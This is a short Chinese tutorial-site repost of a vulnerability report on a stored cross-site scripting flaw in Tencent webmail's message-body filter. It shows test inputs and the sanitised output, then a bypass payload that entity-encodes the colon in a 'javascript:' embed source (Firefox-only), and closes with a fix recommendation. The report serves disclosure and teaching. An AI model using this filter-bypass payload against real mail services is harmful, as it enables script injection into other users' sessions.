腾讯邮箱正文存储行XSS漏洞 - 网站安全 - 自学p-自学php网

子栏目

主页 > 入门引导 > 黑客攻防 >

腾讯邮箱正文存储行XSS漏洞 - 网站安全 - 自学p

来源：自学PHP网时间：2015-04-15 15:00 作者：阅读:次

[导读] 邮件正文的跨站脚本过滤规则不完善导致被绕过。测试1:embed src=javascript：alert(3)结果1：embed invokeurls=false allownetworking=none allowscriptaccess=never type=application x-shock...

邮件正文的跨站脚本过滤规则不完善导致被绕过。

测试1:

<embed src="javascript：alert(3)">

结果1：

<embed invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash">

尽量将测试内容最小化，找出问题根源。测试2：

<embed src="javascript">

结果2:

<embed src="javascript" invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash"></div>

确定伪协议后面的":"触发了过滤规则。实体编码之。测试3:

<embed src="javascript&colon;alert(2)">

结果3:

<embed src="javascript：alert(2)" invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash">

PS：该XSS Vector仅在Firefox下有效

测试与FF29.0.1

修复方案：

完善过滤规则

数据加密在嵌入式系统升级中的应用 - 网站安全

51信用卡管家任意用户密码修改 - 网站安全 - 自学

最新评论

加载更多~~

添加评论

更多文章推荐

渗透网站的一个过程 - 网站安全 - 自学php 2015-04-15
ThinkSNS设计缺陷导致信息泄漏 - 网站安全 - 自学 2015-04-15
从Fuzzing到0day - 网站安全 - 自学php 2015-04-15
powershell写的一句话管理程序 - 网站安全 - 自学 2015-04-15
php利用验证码防止恶意注册学习笔记 - 网站安全 2015-04-15
某OA系统两处SQL注射到GetShell(含详细修复方案) 2015-04-15
麦包包一处越权漏洞可获取他人收货地址 - 网站 2015-04-15
mXSS攻击的成因及常见种类 - 网站安全 - 自学php 2015-04-15
方维团购4.3最新版sql分析 - 网站安全 - 自学php 2015-04-15
51信用卡管家任意用户密码修改 - 网站安全 - 自学 2015-04-15

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论